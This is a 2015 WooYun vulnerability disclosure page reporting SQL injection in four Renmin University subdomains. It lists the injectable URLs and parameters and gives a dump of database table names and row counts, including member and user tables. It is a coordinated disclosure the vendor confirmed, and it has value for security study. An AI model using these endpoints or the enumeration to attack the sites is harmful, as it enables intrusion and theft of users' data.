当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146534

漏洞标题:中国人民大学打包注入漏洞#4站(打包)

相关厂商:中国人民大学

漏洞作者: AuGe

提交时间:2015-10-14 10:03

修复时间:2015-11-28 10:54

公开时间:2015-11-28 10:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-14: 细节已通知厂商并且等待厂商处理中
2015-10-14: 厂商已经确认,细节仅向厂商公开
2015-10-24: 细节向核心白帽子及相关领域专家公开
2015-11-03: 细节向普通白帽子公开
2015-11-13: 细节向实习白帽子公开
2015-11-28: 细节向公众公开

简要描述:

RT 打包能别走小厂商吗?

详细说明:

打包4处分站注入

漏洞证明:

#SQL
注入URL:
1.http://iss.ruc.edu.cn/photo_info.php?sort=4
2.http://cdi.ruc.edu.cn/read.asp?id=217
3.http://0101.ruc.edu.cn/member/index.php?uid=tongdengxueli
4.http://confucian.ruc.edu.cn/jgsz.php?cid=28


第一处


1.jpg


1a.jpg


第二处


2.jpg


第三处


3.jpg


第四处


4.jpg


Database: rwbjorg
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| uc_memberfields | 28618 |
| uc_members | 28618 |
| cdb_memberfields | 28612 |
| cdb_members | 28612 |
| cdb_validating | 28444 |
| cdb_prompt | 27898 |
| cdb_promptmsgs | 24283 |
| cdb_posts | 5335 |
| cdb_threads | 5114 |
| uc_pms | 4841 |
| cms_sys_enum | 3347 |
| cdb_favoriteforums | 1719 |
| cms_area | 482 |
| cms_addonarticle | 462 |
| cms_archives | 432 |
| cms_arctiny | 432 |
| cdb_onlinetime | 430 |
| cms_erradd | 288 |
| cdb_settings | 249 |
| cms_search_keywords | 167 |
| cms_uploads | 165 |
| cdb_rsscaches | 160 |
| cdb_favoritethreads | 155 |
| cms_sysconfig | 150 |
| cdb_smilies | 89 |
| cdb_typeoptions | 65 |
| cdb_stats | 52 |
| cdb_stylevars | 47 |
| cdb_caches | 43 |
| cdb_faqs | 34 |
| cms_arctype | 34 |
| cdb_request | 31 |
| cms_myad | 26 |
| uc_settings | 25 |
| cdb_usergroups | 19 |
| cdb_threadsmod | 18 |
| cdb_threadtags | 17 |
| uc_notelist | 16 |
| cms_stepselect | 15 |
| cdb_taskvars | 14 |
| uc_newpm | 14 |
| cdb_crons | 12 |
| cdb_forumfields | 12 |
| cdb_forums | 12 |
| cdb_magics | 12 |
| cms_scores | 12 |
| cdb_projects | 11 |
| cdb_failedlogins | 10 |
| cdb_medals | 10 |
| cms_arccache | 10 |
| cdb_attachments | 9 |
| cms_arcatt | 8 |
| cms_arcrank | 8 |
| cms_flinktype | 8 |
| cdb_admingroups | 7 |
| cdb_tags | 7 |
| cdb_tasks | 7 |
| cms_sys_module | 7 |
| cdb_prompttype | 6 |
| cms_channeltype | 6 |
| cms_plus | 6 |
| cdb_navs | 5 |
| cdb_ranks | 5 |
| cdb_bbcodes | 4 |
| cdb_onlinelist | 4 |
| cdb_typemodels | 4 |
| cms_flink | 4 |
| cms_member | 4 |
| cms_member_person | 4 |
| cms_member_space | 4 |
| cms_member_tj | 4 |
| cms_payment | 4 |
| cms_shops_delivery | 4 |
| cdb_feeds | 3 |
| cdb_imagetypes | 3 |
| cdb_words | 3 |
| cms_admin | 3 |
| cms_admintype | 3 |
| cms_co_onepage | 3 |
| cms_moneycard_type | 3 |
| cdb_addons | 2 |
| cms_freelist | 2 |
| cms_member_model | 2 |
| cms_member_stowtype | 2 |
| cms_sys_set | 2 |
| uc_applications | 2 |
| cdb_adminactions | 1 |
| cdb_adminsessions | 1 |
| cdb_attachmentfields | 1 |
| cdb_styles | 1 |
| cdb_templates | 1 |
| cms_arcmulti | 1 |
| cms_homepageset | 1 |
| cms_member_group | 1 |
| cms_member_type | 1 |
| cms_multiserv_config | 1 |
| cms_softconfig | 1 |
| cms_vote | 1 |
| cms_vote_member | 1 |
| uc_protectedmembers | 1 |
+---------------------------------------+---------+
Database: course
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| eu5c1_assets | 159 |
| eu5c1_modules_menu | 158 |
| eu5c1_menu | 139 |
| eu5c1_extensions | 112 |
| eu5c1_categories | 67 |
| eu5c1_content | 66 |
| eu5c1_modules | 61 |
| eu5c1_usergroups | 10 |
| eu5c1_weblinks | 9 |
| eu5c1_contact_details | 8 |
| eu5c1_menu_types | 6 |
| eu5c1_template_styles | 6 |
| eu5c1_content_frontpage | 4 |
| eu5c1_newsfeeds | 4 |
| eu5c1_session | 4 |
| eu5c1_viewlevels | 4 |
| eu5c1_banner_clients | 3 |
| eu5c1_banners | 3 |
| eu5c1_update_sites | 2 |
| eu5c1_update_sites_extensions | 2 |
| eu5c1_languages | 1 |
| eu5c1_schemas | 1 |
| eu5c1_user_usergroup_map | 1 |
| eu5c1_users | 1 |
+---------------------------------------+---------+
Database: agora
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| wp_agorapostmeta | 578 |
| wp_agoraposts | 363 |
| wp_agorausermeta | 360 |
| wp_agoraoptions | 265 |
| wp_agoraterm_relationships | 124 |
| wp_agoracomments | 48 |
| wp_agorauam_accessgroup_to_object | 42 |
| wp_agorausers | 21 |
| wp_agoraterm_taxonomy | 10 |
| wp_agoraterms | 10 |
| wp_agorauam_accessgroups | 2 |
| wp_agoranotificationbar | 1 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 990 |
| help_topic | 504 |
| help_keyword | 450 |
| help_category | 37 |
| `user` | 3 |
| db | 1 |
+---------------------------------------+---------+
Database: kzzx
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| kz_articledata | 584 |
| kz_article | 579 |
| kz_file | 122 |
| kz_config | 54 |
| kz_catalog | 45 |
| iplist | 13 |
| kz_links | 10 |
| kz_members | 6 |
| urls | 6 |
| kz_articletype | 4 |
| cnt | 1 |
| kz_advertise | 1 |
| kz_counters | 1 |
| kz_page | 1 |
| shu | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 3405 |
| STATISTICS | 915 |
| KEY_COLUMN_USAGE | 397 |
| PARTITIONS | 355 |
| TABLES | 355 |
| TABLE_CONSTRAINTS | 329 |
| GLOBAL_STATUS | 249 |
| SESSION_STATUS | 249 |
| GLOBAL_VARIABLES | 241 |
| SESSION_VARIABLES | 241 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128 |
| COLLATIONS | 127 |
| CHARACTER_SETS | 36 |
| USER_PRIVILEGES | 32 |
| SCHEMA_PRIVILEGES | 18 |
| PLUGINS | 10 |
| ENGINES | 8 |
| SCHEMATA | 8 |
| PROCESSLIST | 1 |
+---------------------------------------+---------+
Database: ceap_master
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| wp_slim_stats | 4158 |
| wp_slim_stats_3 | 4158 |
| wp_slim_events | 582 |
| wp_slim_outbound | 291 |
| wp_posts | 277 |
| wp_postmeta | 225 |
| wp_options | 199 |
| wp_slim_screenres | 105 |
| wp_slim_browsers | 98 |
| wp_usermeta | 39 |
| wp_term_relationships | 33 |
| wp_slim_content_info | 32 |
| wp_term_taxonomy | 9 |
| wp_terms | 9 |
| psm_person | 8 |
| psm_position | 6 |
| psm_bib | 4 |
| psm_summary | 4 |
| psm_topic | 3 |
| psm_webresources | 3 |
| wp_users | 2 |
+---------------------------------------+---------+


修复方案:

过滤

版权声明:转载请注明来源 AuGe@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-10-14 10:53

厂商回复:

已通知相关网站管理员进行处理

最新状态:

暂无


漏洞评价:

评价